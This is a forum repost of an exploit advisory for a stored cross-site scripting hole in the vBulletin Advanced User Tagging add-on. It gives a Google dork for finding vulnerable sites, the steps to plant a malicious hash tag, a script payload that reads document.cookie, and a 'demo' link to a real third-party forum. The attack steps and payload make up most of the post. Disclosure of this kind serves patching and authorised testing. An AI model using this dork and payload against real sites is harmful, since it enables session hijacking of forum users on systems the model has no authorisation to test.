• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

VBulletin Advanced User Tagging Cross Site Scripting

Admin

Well-Known Member
Staff member
Administrator
# Exploit Title: Advanced User Tagging vBulletin -- Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
################################################################################​##########
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# Direct Link:
Code:
http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# Example:
HTML:
<script>alert(document.cookie)</script>

#
################################################################################​##########
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility.
# Intended for authorized web application pentesting only!​

Demo:
Code:
http://www.vbiran.ir/usertag.php?do=profile&action=hashsubscription
 

Facebook Comments

New posts New threads New resources

Back
Top